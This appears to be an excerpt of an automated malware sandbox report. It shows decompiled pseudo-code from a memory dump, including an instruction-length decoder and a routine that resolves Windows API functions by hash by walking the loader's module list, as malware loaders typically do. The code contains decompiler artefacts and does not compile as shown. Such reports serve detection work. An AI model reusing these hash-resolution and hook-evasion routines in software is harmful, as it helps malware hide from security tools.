					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x709a92e3
0x709a92e7
0x709a92f3
0x709a92f7
0x709a92fb
0x709a9300
0x709a9303
0x709a9305
0x709a9307
0x709a9307
0x709a930a
0x709a9310
0x709a9388
0x709a938c
0x709a938f
0x709a938f
0x709a9392
0x00000000
0x709a9392
0x709a9317
0x709a937f
0x709a9383
0x00000000
0x709a9383
0x709a931e
0x709a9377
0x709a937a
0x00000000
0x709a937a
0x709a9323
0x709a9361
0x709a9368
0x709a936b
0x709a9334
0x709a9334
0x709a933a
0x00000000
0x00000000
0x709a933f
0x709a9359
0x709a935c
0x00000000
0x709a935c
0x709a9344
0x00000000
0x709a9346
0x709a934a
0x709a934d
0x00000000
0x709a934d
0x709a9344
0x709a9395
0x709a9395
0x709a9395
0x709a939e
0x709a93a7
0x709a93aa
0x709a93ad
0x709a93b0
0x709a93b3
0x709a93b9
0x709a93fb
0x709a93fe
0x709a93ff
0x709a9406
0x709a9409
0x709a93bb
0x709a93bf
0x709a93c9
0x709a93d0
0x709a93d2
0x709a93eb
0x709a93ee
0x709a93ee
0x709a93d0
0x709a9411
0x709a9414
0x709a9417
0x709a941b
0x709a941f
0x709a9429
0x709a942d
0x709a9437
0x709a9440
0x709a944d
0x709a9450
0x709a9453
0x709a9453
0x709a945f
0x709a946a
0x709a9470
0x709a9474
0x709a9461
0x709a9461
0x709a9461
0x709a947c
0x709a94a6
0x709a94ac
0x709a94ac
0x709a94b4
0x709a985d
0x709a9863
0x709a9869
0x709a9869
0x00000000
0x709a94ba
0x709a94ba
0x709a94be
0x709a94c1
0x709a94c4
0x709a94c7
0x709a94cb
0x709a94cd
0x709a94d0
0x709a94d3
0x709a94d7
0x709a94dc
0x709a94df
0x709a94e3
0x709a94e8
0x709a94eb
0x709a94ed
0x709a94f0
0x709a94f4
0x709a94f9
0x709a9509
0x709a950f
0x709a950f
0x709a9517
0x709a9519
0x709a9522
0x709a9524
0x709a9527
0x709a9532
0x709a955f
0x709a9534
0x709a954b
0x709a954b
0x709a9567
0x709a956d
0x709a9573
0x709a9573
0x709a9567
0x709a9522
0x709a957a
0x709a95eb
0x709a95f0
0x709a9649
0x709a970b
0x709a9710
0x709a971f
0x709a9725
0x709a9729
0x709a9732
0x709a9739
0x709a9742
0x709a9750
0x709a9753
0x709a973b
0x709a973b
0x709a973b
0x709a9739
0x709a975c
0x709a9789
0x709a979c
0x709a97a4
0x709a978b
0x709a978d
0x709a9795
0x709a9795
0x709a975e
0x709a9763
0x709a9782
0x709a9765
0x709a976a
0x709a977b
0x709a976c
0x709a976c
0x709a976c
0x709a976a
0x709a9763
0x709a97ac
0x709a97bb
0x709a97c8
0x709a97d1
0x709a97d5
0x709a97d9
0x709a97dc
0x709a97df
0x709a97e2
0x709a97e5
0x709a97e8
0x709a97ee
0x709a97f2
0x709a97f8
0x709a97f8
0x709a97ee
0x709a97fe
0x709a983b
0x709a983f
0x709a9846
0x709a984c
0x709a9800
0x709a9803
0x709a9823
0x709a9827
0x709a982e
0x709a9835
0x709a9805
0x709a9808
0x709a980a
0x709a980e
0x709a9818
0x709a981e
0x709a981e
0x709a9808
0x709a9803
0x709a9853
0x709a9853
0x709a986c
0x709a986c
0x709a9872
0x709a9877
0x709a98d1
0x709a98d6
0x709a9915
0x709a991a
0x709a991c
0x709a9920
0x709a9923
0x709a9926
0x709a9928
0x709a9929
0x709a9929
0x709a992e
0x709a994c
0x709a994e
0x709a9952
0x709a9958
0x709a995b
0x709a995d
0x709a995e
0x709a995e
0x00000000
0x709a9930
0x709a9930
0x709a9930
0x709a9934
0x709a993a
0x709a993d
0x709a993f
0x709a9942
0x709a9961
0x709a9961
0x709a9968
0x709a9982
0x709a996a
0x709a996a
0x709a9976
0x709a9977
0x709a997a
0x709a997a
0x709a9990
0x709a9990
0x709a992e
0x709a98db
0x709a98e9
0x709a9901
0x709a9905
0x709a9908
0x709a990e
0x709a9912
0x709a9912
0x00000000
0x709a9912
0x709a98eb
0x709a98ef
0x709a98f5
0x709a98f5
0x709a98fb
0x00000000
0x709a98fb
0x709a98dd
0x709a98e1
0x00000000
0x709a98e1
0x709a987b
0x709a98a7
0x709a98bf
0x709a98c3
0x709a98c6
0x709a98c9
0x709a98cb
0x709a98ce
0x709a98a9
0x709a98a9
0x709a98ad
0x709a98b0
0x709a98b3
0x709a98b6
0x709a98b9
0x709a98b9
0x00000000
0x709a98a7
0x709a9881
0x00000000
0x00000000
0x709a9887
0x709a988b
0x709a9891
0x709a9894
0x709a9897
0x709a989a
0x00000000
0x709a989a
0x709a9712
0x709a9716
0x709a971c
0x00000000
0x709a971c
0x709a9654
0x709a9666
0x709a966b
0x709a96d6
0x00000000
0x00000000
0x709a96dd
0x709a9703
0x709a9707
0x00000000
0x00000000
0x709a96e6
0x709a96eb
0x709a96ff
0x00000000
0x00000000
0x00000000
0x709a9701
0x709a96f2
0x00000000
0x00000000
0x709a96f7
0x00000000
0x00000000
0x709a96f9
0x00000000
0x709a96dd
0x709a966d
0x709a9677
0x709a9688
0x709a968b
0x709a968e
0x709a9694
0x00000000
0x00000000
0x00000000
0x00000000
0x709a969a
0x709a969a
0x709a969a
0x709a96a1
0x00000000
0x00000000
0x709a96a3
0x709a96a6
0x709a96ac
0x00000000
0x00000000
0x00000000
0x709a96ae
0x709a96b0
0x709a96b9
0x00000000
0x00000000
0x709a96cd
0x00000000
0x00000000
0x00000000
0x709a96cf
0x709a965b
0x00000000
0x00000000
0x00000000
0x709a9661
0x709a95f5
0x709a9624
0x709a9625
0x709a962e
0x00000000
0x709a963f
0x00000000
0x709a963f
0x709a95fc
0x709a95ff
0x709a9612
0x709a9613
0x709a9617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x709a95ff
0x709a95f5
0x709a9581
0x709a95de
0x709a95e2
0x709a95e8
0x00000000
0x709a95e8
0x709a9583
0x709a9587
0x709a9594
0x709a9598
0x709a95ae
0x709a95b6
0x709a959a
0x709a959c
0x709a95a6
0x709a95a6
0x709a95bc
0x709a95c5
0x709a95dc
0x00000000
0x00000000
0x00000000
0x709a95dc
0x709a95c7
0x709a95c7
0x00000000
0x709a95bc

Strings

, xrefs: 709A9947

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: f5107349829b6c4eb920459e82f949fa6677e71bce23118c7979d32cb1ea605b
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 9022BEB08083958BDB16CF15C89136EBBF9BF86304F10886EE9D64B295D3389D45DB93

Uniqueness

Uniqueness Score: -1.00%

Function 709A14D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E709A14D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E709A03A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x709ad208 == 0 ||  *0x709ad2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E709A4BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x709ad2ec |  *0x709ad2ed;
									if(( *0x709ad2ec |  *0x709ad2ed) == 0) {
										_t525 =  *0x709ad208; // 0xde1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x709ad2ec = 1;
											_t526 = E709A3558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E709A1CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x709ad208 = _t526;
											 *0x709ad2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E709A3558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E709A1CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E7099E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E7099E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x709ad20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x709ad210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E7099E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E709A2F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x709ad2e4 = 1;
					E7099F620( &(_t535[0x38]), 0);
					E7099F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E7099F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E709A2F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E7099F8C4( &(_t535[0xc]), E7099F568( &(_t535[8])) + 0x14);
								_t369 = E7099F558( &(_t535[0xc]), E7099F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E7099F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E7099F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E7099F6F0( &(_t535[8]));
							E7099F6F0( &(_t535[0x164]));
							E7099F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E7099F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E709A1DD0(0xa5eabdf8);
							_t290 = E709A1388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E709A1D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E7099D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E709A5C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E709A5C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E709A8D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E7099F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E7099BC00( &(_t535[0x110]));
							}
							E7099D098( &(_t535[0x104]));
							E7099D098(_t518);
							E7099D098( &(_t535[0x15c]));
							E7099D098( &(_t535[0x154]));
							E709A9058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E7099F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E709A901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E7099F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E7099F568( &(_t535[0x44]));
								_t519 =  *(0x709abce0 + _t381 * 4);
								_t531 = E709A8FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E709A8754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E7099F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E7099F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E7099F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E7099F8C4( &(_t535[0x20]), E7099F568( &(_t535[0x1c])) + 8);
										E7099F558( &(_t535[0x20]), E7099F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E709A30A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E7099F8C4( &(_t535[0x48]), _t535[0x70]);
									E709A30A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E7099F8DC( &(_t535[0x44]), _t563);
									E7099F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E709A90A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E709A9070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E7099F6F0( &(_t535[0x144]));
